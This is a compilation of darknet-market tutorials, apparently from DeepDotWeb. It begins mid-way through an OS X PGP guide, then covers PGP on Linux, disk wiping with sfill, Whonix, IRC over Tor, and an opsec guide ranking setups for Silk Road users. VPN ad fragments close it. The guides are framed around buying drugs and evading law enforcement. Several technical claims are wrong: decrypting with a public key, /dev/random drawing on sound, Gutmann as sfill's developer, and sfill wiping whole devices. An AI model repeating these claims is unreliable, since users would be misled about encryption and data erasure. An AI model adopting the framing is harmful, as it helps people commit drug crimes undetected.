- You should see a small popup. Click the arrow beside ‘Advanced options’, make sure the key length is 4096. For our purposes, we’ll uncheck ‘key expires’. Put your username where it says ‘full name’, fill out what you want for email, and create a secure passphrase. Check the picture for an example on how to fill it out. When complete, click ‘Generate key’
- GPG Keychain will begin generating your key. Move the mouse around, mash keys in a text editor, have something downloading. Do random stuff to create entropy for a secure key.
- annndddddd we’re done!
Part 3 – Setting up the environment
This is where OS X differs from other platforms. The suite itself doesn’t provide a window to encrypt/decrypt messages, so we need to enable some options.
- Go into system preferences, open up ‘Keyboard’
- You should see this window. Click the ‘Keyboard Shortcuts’ tab at the top, then ‘Services’ in the left pane. Scroll down in the right pane to the subsection labeled ‘Text’, and to the OpenPGP options. Here you can create keyboard shortcuts. We’ll uncheck everything OpenPGP that’s under ‘Text’, and delete their shortcuts. Now we’ll enable ‘Decrypt’, ‘Encrypt’, and ‘Import key’. Create keyboard shortcuts for these if you wish. Check the picture to make sure you’re doing everything correctly. You can now close the window.
Part 4 – Obtaining your public key
This part is super simple.
- Open up GPG Keychain, select your key
- At the top of the window, click ‘Export’
- Give it a name, make sure ‘include secret key in exported file’ is unchecked, and click ‘save’
- Open your text editor of choice, browse to where you saved the key, open it
- There it is. Copy and paste this on your market profile to make it easier for people to contact you
Part 5 – Obtaining your private key
Again, super simple.
- Open up GPG Keychain, select your key
- At the top of the window, click ‘Export’
- Keep the file name it gives you, check ‘Include secret key in exported file’, then click save
Keep this file in a safe place, and don’t forget your passphrase. You’re fucked without it!
Part 6 – Importing a public key
This is really easy.
- Find the key you want to import.
- Copy everything from ‘—–BEGIN PGP PUBLIC KEY BLOCK—–‘ to ‘—–END PGP PUBLIC KEY BLOCK—–‘
- Paste it into your favourite text editor, highlight everything, right click, go to ‘Services’, then ‘OpenPGP: Import key’
- You’ll see this window pop up confirming the key has been imported, click ‘Ok’
- Open up GPG Keychain just to confirm the key is there
Part 7 – Importing a private key
Again, really easy.
- Open GPG Keychain, click ‘Import’ at the top
- Browse to where your key is, click it, then click ‘Open’. It should have a .asc file extension
- You’ll see this pop up confirming your key has been imported. Click ‘Close’
Part 8 – Encrypting a message
- Open your text editor of choice, write your message
- Highlight the message, right click, ‘Services’, ‘OpenPGP: Encrypt’
- A window should appear. Select who you’re sending it to, sign it with your key if you wish, click ‘Ok’
- Copy everything, and send it to the recipient
Part 9 – Decrypting a message
Pretty much the same process as encrypting
- Open your text editor of choice, paste the message
- Highlight everything, right click, ‘Services’, ‘OpenPGP: Decrypt’
- A window should pop up. Enter your passphrase, then click ‘Ok’
- aannnddddd there’s your message
Part 10 – Conclusion
That wasn’t too hard, was it? Like I said in the intro, you shouldn’t be using OS X for DNM activities due to privacy issues, but I won’t go into it. This took forever to complete because OS X is a bitch to get running properly in a virtual machine. A guide for Windows will be coming next week!
Full credit goes to MLP_is_my_OPSEC for writing this tutorial – Thanks for publishing and giving us your permission to post it!
Part 0 – Introduction
I promised it, and here it is! The PGP guide for Linux! Great timing too for Moronic Monday. For this guide we’ll be using GnuPG with Gnu Privacy Assistant as a graphical front-end. We will be using CLI to install these two pieces of software, and creating the keypair. The example OS in question is Linux Mint, so the commands for install may differ from your current OS. Don’t fret though! That’s the only part that may not be relevant to your OS, the rest of the guide will be the same across distros.
Part 1 – Installing the software
Like I said in the intro, we’ll be using GnuPG with Gnu Privacy Assistant. I like GPA as a graphical front-end because its layout is really easy to understand and follow.
- Open up Terminal
- Type, without quotes, ‘sudo apt-get install gpa gnupg2’, then hit ‘enter’
- Enter your password, hit ‘enter’
- It will pull the dependancies needed for both to work properly, tell you the space needed, and ask you to confirm. Type ‘y’ then hit ‘enter’ to confirm
- Wait a bit as everything installs
This should only take a few minutes to complete. See this picture to confirm you’re doing the steps correctly:
Part 2 – Generating your keypair
Part 1 was easy, eh? Don’t worry things don’t get much harder. The next step is to create your keypair. We’ll be using 4096 bit RSA to keep things extra secure!
- In your Terminal, type without quotes ‘gpg –gen-key’, then hit ‘enter’
- It will ask you what kind of key you want. For our usecase, we want option ‘1’ :
- Next step is key length. The longer the length, the more secure it is. We’ll go with 4096 bits:
- It will now ask if you want your key to expire after a certain amount of time. This is up to personal preference, but we’ll choose ‘key does not expire’, so just hit ‘enter’
- Confirm that yes, the key will not expire. Type ‘y’, then hit ‘enter’
- The next step will be to enter an ID to make it easier for people to identify your key. If you’ve made it this far, you should know what to do
- It will ask if this information is correct. If it is, type ‘O’ and hit ‘enter’
Here is a great XKCD comic on creating secure passphrases
- Enter a passphrase to protect your secret key.
- Here comes the fun part. It’s going to generate your key, and will ask you to do some random stuff to create entropy. I like to have a Youtube video going with a torrent running in the background, while randomly mashing keys in a text editor. See the picture for an example of what will be output in the terminal
- annnddddd we’re done!
Part 3 – Obtaining your public key
So we’ve installed the software, generated our super secure keypair. Now what? Well if you want to actually use it we need to obtain our public key. Everything from here will be done through the graphical front-end.
- Open Terminal, type ‘sudo gpa’, hit ‘enter’. Type in your password yeahIknowwhatyou’rethinking
- You’ll be greeted by this beautiful window
- Click on the keypair you just created, click ‘Keys’ up at the top, then ‘Export keys…’
- Select where you want it saved, enter a filename, and click ‘Save’
- Browse to the location in your file manager, open up that file with a text editor
There’s your public key! Don’t forget to put this on your market profile so people can contact you easier.
Part 4 – Obtaining your private key
If you ever want to switch operating systems or PGP programs, you’ll need to do this. It’s just as easy as obtaining your public key. Make sure you keep this file safe!
- Hopefully you still have GPA open. If not, follow step #1 of Part 3
- Click on your keypair, click ‘Keys’ up at the top then ‘Backup’
- Select where you want it saved, keep the filename it gives you, and click ‘Save’
- A window will pop up, you can back up to a floppy if you’re stuck in the ’80s
Remember to keep this file safe! Don’t forget your passphrase!
Part 5 – Importing a public key
So you want to buy some dank marijuanas, you’ll need to encrypt your message unless you want LE kicking down your door and putting a boot to your throat. How is this done? Easy!
- Obtain the recipients public key, which can hopefully be found on their profile
- Copy everything, paste into a text editor, save it somewhere
- Up at the top, click ‘Keys’, then ‘Import key…’
- Select the key, then click ‘Open’. You’ll see this window
- We’re done!
I used some random key found on DDG. Thanks Alan!
Part 6 – Importing a private key
You finally realized that Microsoft/Apple is spying on you, and want to switch to an operating system that respects your right to privacy. How do you bring your key over?
- Up at the top, select ‘Keys’, then ‘Import Keys…’
- Select your backup, it should have a file extension of .asc
- This window will appear
- Your key is now imported
I could do this blindfolded!
Part 7 – Encrypting a message
GPA makes this easy as pie. Seriously, if you still can’t do it after following the below steps you shouldn’t be here.
- Click ‘Windows’ at the top, then ‘Clipboard’
- This beautiful window will appear
- Type in your message
- Click the envelope with the blue key
- Select the recipient of the message, sign it with your key if you want, then click ‘Ok’
- Your encrypted message will now appear in the buffer. Copy everything and send this to the recipient
Part 8 – Decrypting a message
You sent your message, and the vendor responded! Now what? You’ll want to decrypt the message with your public key.
- Copy everything the vendor sent you, paste it into the buffer
- Click the envelope at the top with the yellow key
- Enter your passphrase
- Read your message
Part 9 – Conclusion
There we have it, an easy to follow PGP guide for Linux with pictures! PGP can be overwhelming at first, but with persistence and the willingness to learn anyone can do it. Hopefully this guide will keep you guys safe on the DNM! I’ll have an OS X guide coming soon, and possibly a Windows guide following that. Any and all constructive feedback is appreciated, as well as suggestions for other guides!
In this article, I’m going to be outlining how to securely erase data on a device while running a GNU/Linux-based operating system. This process can be used to wipe a device, such as a USB drive, while running your normal GNU/Linux operating system; or it can be used to wipe your hard drive from a GNU/Linux live CD/USB.
There are many reasons you might want to erase data from a device. It’s possible that you are selling an old computer, and need to eliminate private data. It’s possible your identity has been compromised, and you need to eliminate evidence. Whatever the situation is, simple deletion of files will not securely erase data. If you truly need to erase data from a device, you will need to wipe the device. What’s the issue with simply deleting your data? Deletion of a file does not actually remove the data from a disk; it only deletes the entry in the filesystem metadata. This informs the operating system that the space is free and can be written to. The actual raw data is still located on the disk. Even if a disk is reformatted or repartitioned, the raw data may still remain on the disk. With widely-available data recovery software, most of this data can be quickly recovered. The only way to assure that data cannot be recovered is by verifying that all space on a disk, including inodes, are overwritten with new data.
How does data wiping work? The term “wiping” is actually a bit misleading, because wiping is not just the removal of data. Wiping software actually overwrites all sectors of a disk or partition, ensuring that none of the original raw data remains. Software generally overwrites this data with a combination of zeros and random numbers. These random numbers are produced by a random number generator. /dev/random is a random number generator in the Linux kernel. When /dev/random is read, it will return pseudo-random bits generated from sound produced by device drivers. /dev/random and /dev/urandom are both commonly used to produce pseudo-random bits. However, /dev/urandom reuses the bits in the internal pool to more quickly produce more bits. /dev/urandom is generally considered to be less secure than /dev/random; however, it is much faster and less resource-intensive than /dev/random. For something like cryptographic key generation, you would want to use /dev/random. However, for something like data wiping, the use of /dev/urandom is considered secure.
The wiping utility of my choice is sfill, a small command-line utility that is lightweight but very effective. If you are running a Debian-based distribution, the package should be included by default. Otherwise, this tool is included in the ‘secure-delete’ package. If you are wiping the primary hard drive in your computer, you will need to use a bootable Linux Live CD. You also need to locate the partition or disk you want to wipe (ex. /dev/sda2). For this, you can use GParted or any partition editor. At this point, be sure to verify that you have identified the correct disk. Once you locate this, you will need to run sfill from the command line, pointing it to this disk. The default parameters are secure, so you only need to apply additional arguments if you want to use verbose mode or want additional options. The technical process used by the software is outlined in the sfill Manpage. sfill first overwrites data with zeros. This is only one pass. The next 5 passes overwrite the data with random data from /dev/urandom. After this, data is overwritten 27 passes with values defined by Peter Gutmann, the developer of sfill. The next 5 passes again overwrite with data from /dev/urandom. After this process, temporary files are created to fill inode space. Inode stands for “index node”, and these are used to index the files on a partition. After all free space on the partition is filled, the temporary files are removed and the wiping is finished. At this point, the data wiping process is complete. You can now be confident that your data cannot be recovered.
Whonix is an operating system focused on anonymity, privacy and security. It’s based on the Tor anonymity network and security by isolation. DNS leaks are impossible, and not even malware with root privileges can find out the user’s real IP. This makes it a safer way to access the Deep Web opposed to just using Tor on your current operating system. It is especially discouraged to be using Tor with a Windows operating system because of the direct access that the NSA has to Microsoft’s systems and the information that Microsoft is willing to hand over to them.
Before using Whonix, it is helpful to understand how exactly it works. Whonix is made up of two parts. There is one that solely runs Tor and acts as a gateway, aptly called Whonix-Gateway. The second part which the user actually uses is called the Whonix-Workstation. It is on a completely isolated network that only allows connections through Tor. Both of these parts are run in their own virtual machines on your computer and this keeps what you docontained within Whonix.
To start you will first want to download VirtualBox. This will allow you to create the virtual machines for running Whonix on your computer. Then download both Whonix-Gateway and Workstation. There are a couple download options and you can choose which one you think is best. It is also suggested that you verify the images using the Signing Key if you understand how to do so. If not, you may want to learn how with the guide on PGP encryption.
After installing VirtualBox, open up the program and just follow a few simple steps:
- Click File > Import Appliance…
- Click “Choose” and select the downloaded Whonix-Gateway.ova file.
- Click next and then “Import” without changing any of the settings.
- Wait for the progress bar to complete the import.
- Repeat those steps for the Whonix-Workstation.ova file.
- Now start both the Whonix-Gateway and Whonix-Workstation.
For your first use you will have to go through a quick setup process and then wait for Whonix to search for and install any necessary updates. Keep in mind you will need to keep Whonix-Gateway running but you don’t actually use it for anything besides updating. You will conduct all your activities within the Whonix-Workstation virtual machine window.
Now you can use Whonix to browse in a safer and more secure way, all without having to make drastic changes to your computer.
Hey everyone! First off, thanks a lot to everyone at DeepDotWeb for allowing me to make this and many more posts to come! I really hope everyone on the website finds it useful! So, on to the tutorial. Tor, as we all know, Tor is a network that uses peer-to-peer connections. These connections from one person to another are very strongly encrypted, not only allowing people to securely go to websites without leaving a trace of who they are, but they allow people to encrypt everyday internet connections. Today, I will be focusing the main part of today’s tutorial on connecting to IRC networks via Tor. Keep in mind, I will be explaining this from complete start to end as if you are just learning about what Tor is.
The first thing you are going to need is obviously the latest version of Tor from the Tor website. It’s going to download an exe file for you to open and extract. Go ahead, and extract the files to a place where you are going to have easy access to it. I personally extract all the files to a folder on my Desktop so I can get to it at any time.
Now that you have Tor ready to go, you will see four folders and one file called “Start Tor Browser.exe”. All you have to do to get Tor started is run the “Start Tor Browser.exe”. You will then be greeted with a screen asking if you would like to just connect to the Tor network, or if you would like to configure how you connect to the Tor network. All you need to do is push the “Connect” button, and you will be directed to another screen that goes through the process of connecting to the network automatically.
Now that all the menus have been taken care of, your life will be much simpler, since it is the last time you will have to deal with it. After all of those menus are closed, you will be greeted with a nice webpage that says you are configured to use Tor and that you are ready to go! Feel free to click the “Test Tor Network Settings” button for a double check. That step is optional, but you absolutely should go up to the little “S” with an exclamation point on it, click it, and check the “Forbid Scripts Globally” button. This will protect you from accidently leaking important information while browsing the internet.
Alright. Your Tor browser is now up and running. For the next steps, you must keep the Tor Browser open. If it is closed at any time, the connection will close. For this example, I will be using the HexChat IRC client. Finding an IRC server will be up to you, but a simple search on a directory website will surely get you some results. So firs you will need to open up HexChat or your favorite IRC client and get to the settings and/or preferences area. From that menu, you will need to get to the “Networking” and/or “Proxy” section.
From this menu, you will need to enter the proxy settings for the connection. Using this example, the “Hostname” will need to be “127.0.0.1” or “localhost”. Either one will work. The “Port” will need to be set to “9150”. The “Type” will be set to “Socks5”. And finally, “Use proxy for” will be need to be set to “All Connections”. Breaking this down, the IRC client connects via the Socks5 proxy at 127.0.0.1 on port 9150 to the IRC server over all the IRC connections so all the connections will be encrypted. After all this is entered, just hit the “OK” button.
After this, all you need to do is add a server to connect to, select your usernames, if you wish to use SSL, and other personal settings which will depend on your personal preferences. And that is it! You are now connected to an IRC server via Tor with the full encryption benefits of Tor! And this isn’t just used for IRC. This can be used on pretty much anything that allows a proxy connection such as Firefox, Chrome, Pidgin, FTP connections, PuTTY, and much more!
With that, I once again thank DeepDotWeb for allowing me to write for them, and I thank you the reader for reading this tutorial. I hope this helps you as much as it helps me, weather you are brand new to the use of Tor, or an old user such as myself!
In the wake of the Freedom Hosting exploit, I think we should reevaluate our threat model and update our security to better protect ourselves against the real threats that we face. So I wrote this guide in order to spark a conversation. It is by no means comprehensive. I only focus on technical security. Perhaps others can address shipping and financial security. I welcome feedback and would like these ideas to be critiqued and expanded.
As I was thinking about writing this guide, I decided to take a step back and ask a basic question: what are our goals? I’ve come up with two basic goals that we want to achieve with our technical security.
1. Avoid being identified.
2. Minimize the damage when we are identified.
You can think of these as our _guiding security principles_. If you have a technical security question, you may be able to arrive at an answer by asking yourself these questions:
1. Does using this technology increase or decrease the chances that I will be identified?
2. Does using this technology increase or decrease the damage (eg, the evidence that can be used against me) when I am identified?
Obviously, you will need to understand the underlying technology to answer these questions.
The rest of this guide explains the broad technological features that decrease the chances we are identified and that minimize the damage when we are identified. Towards the end I list specific technologies and evaluate them based on these features.
First, let me list the broad features that I have come up with, then I will explain them.
3. Minimal execution of untrusted code
To some extent, we’ve been focusing on the wrong things. I’ve predominantly been concerned with network layer attacks, or “attacks on the Tor network”, but it seems clear to me now that application layer attacks are far more likely to identify us. The applications that we run over Tor are a much bigger attack surface than Tor itself. We can minimize our chances of being identified by securing the applications that we run over Tor. This observation informs the first four features that we desire.
Short of not using computers at all, we can minimize threats against us by simplifying the technological tools that we use. A smaller code base is less likely to have bugs, including deanonymizing vulnerabilities. A simpler application is less likely to behave in unexpected and unwanted ways.
As an example, when the Tor Project evaluated the traces left behind by the browser bundle, they found 4 traces on Debian Squeeze, which uses the Gnome 2 desktop environment, and 25 traces on Windows 7. It’s clear that Windows 7 is more complex and behaves in more unexpected ways than Gnome 2. Through its complexity alone, Windows 7 increases your attack surface, exposing you to more potential threats. (Although there are other ways that Windows 7 makes you more vulnerable, too.) The traces left behind on Gnome 2 are easier to prevent than the traces left behind on Windows 7, so at least with regard to this specific threat, Gnome 2 is desirable over Windows 7.
So, when evaluating a new technological tool for simplicity, ask yourself these questions:
Is it more or less complex than the tool I’m currently using?
Does it perform more or fewer (unnecessary) functions than the tool I’m currently using?
We should favor technologies that are built by professionals or people with many years of experience rather than newbs. A glaring example of this is CryptoCat, which was developed by a well-intentioned hobbyist programmer, and has suffered severe criticism because of the many vulnerabilities that have been discovered.
We should favor technologies that are open source, have a large user base, and a long history of use, because they will be more thoroughly reviewed.
When evaluating a new technological tool for trustworthiness, ask yourself these questions:
Who wrote or built this tool?
How much experience do they have?
Is it open source, and how big is the community of users, reviewers, and contributors?
===Minimal Execution of Untrusted Code===
The first two features assume the code is trusted but has potential unwanted problems. This feature assumes that as part of our routine activities, we may have to run arbitrary untrusted code. This is code that we can’t evaluate in advance. The main place this happens is in the browser, through plug-ins and scripts.
You should completely avoid running untrusted code, if possible. Ask yourself these questions:
Are the features that it provides absolutely necessary?
Are there alternatives that provide these features without requiring plug-ins or scripts?
Isolation is the separation of technological components with barriers. It minimizes the damage incurred by exploits, so if one component is exploited, other components are still protected. It may be your last line of defense against application layer exploits.
The two types of isolation are physical (or hardware based) and virtual (or software based). Physical isolation is more secure than virtual isolation, because software based barriers can themselves be exploited by malicious code. We should prefer physical isolation over virtual isolation over no isolation.
When evaluating virtual isolation tools, ask yourself the same questions about simplicity and trustworthiness. Does this virtualization technology perform unnecessary functions (like providing a shared clipboard)? How long has it been in development, and how thoroughly has it been reviewed? How many exploits have been found?
Encryption is one of two defenses we have to minimize the damage when we are identified. The more encryption you use, the better off you are. In an ideal world, all of your storage media would be encrypted, along with every email and PM that you send. The reason for this is because, when some emails are encrypted but others are not, an attacker can easily identify the interesting emails. He can learn who the interesting parties are that you communicate with because those will be the ones you send encrypted emails to (this is called metadata leakage). Interesting messages are lost in the noise when everything is encrypted.
The same goes for storage media encryption. If you store an encrypted file on an unencrypted hard drive, an adversary can trivially determine that all the good stuff is in that small file. But when you use full disk encryption, you have more plausible deniability as to whether the drive contains data that would be interesting to that adversary, because there are more reasons to encrypt an entire hard drive than a single file. Also, an adversary who bypasses your encryption would have to cull through more data to find the the stuff that is interesting to him.
Unfortunately, using encryption incurs a cost that the vast majority of people can’t bare, so at a minimum, sensitive information should be encrypted.
On a related note, the other defense against damage is secure data erasure, but that takes time that you may not have. Encryption is preemptive secure data erasure. It’s easier to destroy encrypted data, because you only have to destroy the encryption key to prevent an adversary from accessing the data.
Finally, I’d like to add a related non-technical feature.
In some cases, the technology we use is only as safe as our behavior. Encryption is useless if your password is “password”. Tor is useless if you tell someone your name. It may surprise you how little an adversary needs to know about you in order to uniquely identify you. Here are some basic rules to follow:
Don’t tell anyone your name. (obv)
Don’t describe your appearance, or the appearance of any major possessions (car, house, etc.).
Don’t describe your family and friends.
Don’t tell anyone your location beyond a broad geographical area.
Don’t tell people where you will be traveling in advance (this includes festivals!).
Don’t reveal specific times and places where you lived or visited in the past.
Don’t discuss specific arrests, detentions, discharges, etc.
Don’t talk about your school, job, military service, or any organizations with official memberships.
Don’t talk about hospital visits.
In general, don’t talk about anything that links you to an official record of your identity.
===A List of Somewhat Secure Setups for Silk Road Users===
I should begin by pointing out that the features outlined above are not equally important. Physical isolation is probably the most useful and can protect you even when you run complex and untrusted code. In each of the setups below, I assume a fully updated browser / TBB with scripts and plug-ins disabled. Also, the term “membership concealment” means that someone watching your internet connection doesn’t know you are using Tor. This is especially important for vendors. You can use bridges, but I’ve included extrajurisdictional VPNs as an added layer of security.
With that in mind, here is a descending list of secure setups for SR users.
Starting off, I present to you the most secure setup!
A router with a VPN + an anonymizing middle box running Tor + a computer running Qubes OS.
Advantages: physical isolation of Tor from applications, virtual isolation of applications from each other, encryption as needed, membership concealment against local observers with VPN
Disadvantages: Qubes OS has a small user base and is not well tested, as far as I know.
Anon middle box (or router with Tor) + Qubes OS
Advantages: physical isolation of Tor from applications, virtual isolation of applications from each other, encryption as needed
Disadvantages: Qubes OS has a small user base and is not well tested, no membership concealment
VPN router + anon middle box + Linux OS
Advantages: physical isolation of Tor from applications, full disk encryption, well tested code base if it’s a major distro like Ubuntu or Debian
Disadvantages: no virtual isolation of applications from each other
Anon middle box (or router with Tor) + Linux OS
Advantages: physical isolation of Tor from applications, full disk encryption, well tested code base
Disadvantages: no virtual isolation of applications from each other, no membership concealment
Qubes OS by itself.
Advantages: virtual isolation of Tor from applications, virtual isolation of applications from each other, encryption as needed, membership concealment (possible? VPN may be run in VM)
Disadvantages: no physical isolation, not well tested
Whonix on Linux host.
Advantages: virtual isolation of Tor from applications, full disk encryption (possible), membership concealment (possible, VPN can be run on host)
Disadvantages: no physical isolation, no virtual isolation of applications from each other, not well tested
Advantages: encryption and leaves no trace behind, system level exploits are erased after reboot, relatively well tested
Disadvantages: no physical isolation, no virtual isolation, no membership concealment, no persistent entry guards! (but can manually set bridges)
Whonix on Windows host.
Advantages: virtual isolation, encryption (possible), membership concealment (possible)
Disadvantages: no physical isolation, no virtual isolation of applications from each other, not well tested, VMs are exposed to Windows malware!
Advantages: full disk encryption (possible), membership concealment (possible)
Disadvantages: no physical isolation, no virtual isolation
Advantages: full disk encryption (possible), membership concealment (possible)
Disadvantages: no physical isolation, no virtual isolation, the biggest target of malware and exploits!
Assuming there is general agreement about the order of this list, our goal is to configure our personal setups to be as high up on the list as possible.
Thanks for your attention, and again I welcome comments and criticism.
– No Logs
– Best For Tor
– DNS Leak Protection
– Unlimited Bandwidth
– Super Fast
– 7 Day Trial
– Open VPN
– L2TP/ IPSec
30 Day Guarantee
Easy Set Up
DNS Leak protection
No DCMA Response
Easy To Use
Simple to Use